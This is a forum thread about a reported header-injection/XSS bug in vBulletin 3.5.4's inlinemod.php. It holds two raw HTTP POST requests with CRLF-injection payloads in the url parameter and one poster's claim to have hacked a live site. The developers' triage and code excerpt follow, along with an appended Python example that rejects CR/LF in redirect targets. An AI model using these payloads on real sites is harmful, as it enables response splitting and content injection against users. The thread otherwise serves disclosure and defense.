vBulletin 3.5.4 XSS issue
  • vBulletin 3.5.4 XSS issue

    XSS attack.
    The bug exists because of insufficient processing of
    input information in the url parameter of inlinemod.php

    Example:
    POST /vb354/inlinemod.php HTTP/1.0
    Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
    Content-Length: 93
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
    Host: www.vulnerable.com
    Content-Type: application/x-www-form-urlencoded

    do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

    I didn't find any way to fix it, but I hacked one website that uses vBulletin 3.5.4

    PS: You don't need to ban me, I am doing this to help you guys

  • #2
    Can't confirm this in a 3.5.2 build.
    ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
    Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment



    • #3
      This was posted in the bug tracker this morning and neither Mike nor myself can reproduce this.

      Apache 2.0.x, Apache 1.3.x and IIS were tested with a mixture of PHP applications. The end result was either an HTTP redirect OR a 301 moved message from Apache.

      I doubt you hacked a site this was on as it requires Mod privileges and somehow getting around the REFERRER checking and also hoping that the PHP version is < 4.4.2.

      Feel free to post a site that this works on so I can check the PHP version and web server.
      Scott MacVicar



      • #4
        Oh, the function is exec_header_redirect, for anyone interested.

        header("Location: $url");
        header('HTTP/1.1 301 Moved Permanently');

        Should also be noted that $url goes through xss_clean in class_core.php

        Code:
        function xss_clean(&$var)
        {
            // Patterns that defang script-scheme keywords. Note that nothing
            // in this function touches CR or LF characters.
            static
                $preg_find    = array('#javascript#i', '#vbscript#i'),
                $preg_replace = array('java script',   'vb script');

            // HTML-escape first (vBulletin's htmlspecialchars_uni), then break the keywords.
            $var = preg_replace($preg_find, $preg_replace, htmlspecialchars_uni($var));
            return $var;
        }
        Just in case anyone wants to spend time reproducing it.
        Scott MacVicar



        • #5
          Check it out lol

          This is an exploit for ImpEx 1.74, PHP including in ImpEx

          <zapped>



          • #6
            Uh oh... Upgrade time again?
            Last edited by jmvb; Tue 2 May '06, 5:08pm.



            • #7
              ImpEx is not a core vBulletin module; it is only used while an upgrade is in progress.

              Please stop posting "exploits" or you will be banned.
              Scott MacVicar



              • #8
                ImpEx is not a core vBulletin module; it is only used while an upgrade is in progress.
                But it's still a bug; sometimes people forget to delete ImpEx and here you go =)))



                • #9
                  This was fixed in CVS 6 months ago by jerry during a random audit and has already been mentioned.

                  I see you stopped mentioning the first "exploit" you used.

                  Code:
                  http://devbox/vb35x/inlinemod.php
                  
                  POST /vb35x/inlinemod.php HTTP/1.1
                  Host: devbox
                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
                  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
                  Accept-Language: en-us,en;q=0.5
                  Accept-Encoding: gzip,deflate
                  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
                  Keep-Alive: 300
                  Connection: keep-alive
                  Referer: http://devbox/vb35x/forumdisplay.php?f=2
                  Cookie: bbuserid=1; vbulletin_collapse=templateusage; bbpassword=bd68d82513d0161c47b96e7da8bba794; acpcollapseprefs=100; bblastvisit=1143550886; vbcodemode=0; bblastactivity=1145913653; collapseprefs=100,debug; bbsessionhash=62d3fe42f097068a4d1bf2320425bc62; bbforum_view=ce615f0959e7373227560a9fc0b96672a-1-%7Bi-2_i-1146618953_%7D; vbulletin_inlinethread=1
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 180
                  do=clearthread&url=lala2%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Ehey%3C/font%3E%3C/html%3E
                  
                  HTTP/1.x 301 Moved Permanently
                  Date: Wed, 03 May 2006 01:20:22 GMT
                  Server: Apache/2.0.54 (Unix) PHP/5.1.1 mod_perl/2.0.2 Perl/v5.8.3
                  X-Powered-By: PHP/5.1.1
                  Cache-Control: private
                  Pragma: private
                  Set-Cookie: vbulletin_inlinethread=deleted; expires=Tue, 03-May-2005 01:20:22 GMT; path=/
                  Location: http://devbox/vb35x/lala2
                  Content-Type: text/html
                  HTTP/1.1: 200 OK
                  Inject worked but the redirect still happened with no code execution.
                  Scott MacVicar

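The point made in posts #4 and #9 is that xss_clean() escapes HTML but never removes CR/LF, so the url value reaches header("Location: ...") with its line breaks intact; only a newer PHP (4.4.2+) header() refuses it. The following is an added example, not vBulletin code: a Python re-creation of xss_clean() as shown in post #4 (html.escape stands in for htmlspecialchars_uni), applied to the decoded url value from post #9, next to a hardened validator that rejects CR/LF and off-host targets before anything is written into a Location header. The host name "devbox" and the "/vb35x/" prefix are taken from the capture in post #9.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Re-creation of vBulletin 3.5.x xss_clean() from post #4 (constructed for this example):
# HTML-escape the value, then break the "javascript" / "vbscript" keywords.
_PREG = [(re.compile("javascript", re.I), "java script"),
         (re.compile("vbscript", re.I), "vb script")]

def xss_clean(var: str) -> str:
    cleaned = html.escape(var, quote=True)      # stands in for htmlspecialchars_uni()
    for pattern, replacement in _PREG:
        cleaned = pattern.sub(replacement, cleaned)
    return cleaned                              # CR and LF pass through untouched

def contains_crlf(value: str) -> bool:
    """True if a would-be header value still carries a line break."""
    return "\r" in value or "\n" in value

def safe_redirect_target(url: str, allowed_host: str) -> Optional[str]:
    """Hardened replacement for passing the url parameter straight to header().

    Returns the absolute Location to emit, or None if the value must be refused.
    CR/LF is checked first because urlsplit() silently strips those characters.
    """
    if contains_crlf(url):
        return None
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:            # absolute URL: must stay on our own host
        if parts.scheme not in ("http", "https") or parts.netloc.lower() != allowed_host:
            return None
        return url
    # Relative value: prefix the board URL, as exec_header_redirect does in post #9.
    return f"http://{allowed_host}/vb35x/{url.lstrip('/')}"

# The url value from the post #9 capture, percent-decoded the way PHP does for $_POST.
CAPTURED_URL = unquote(
    "lala2%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Ehey%3C/font%3E%3C/html%3E"
)

if __name__ == "__main__":
    cleaned = xss_clean(CAPTURED_URL)
    print("xss_clean keeps CR/LF:", contains_crlf(cleaned))          # True
    print("hardened check result:", safe_redirect_target(CAPTURED_URL, "devbox"))  # None
    print("benign value:", safe_redirect_target("lala2", "devbox"))   # http://devbox/vb35x/lala2
```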
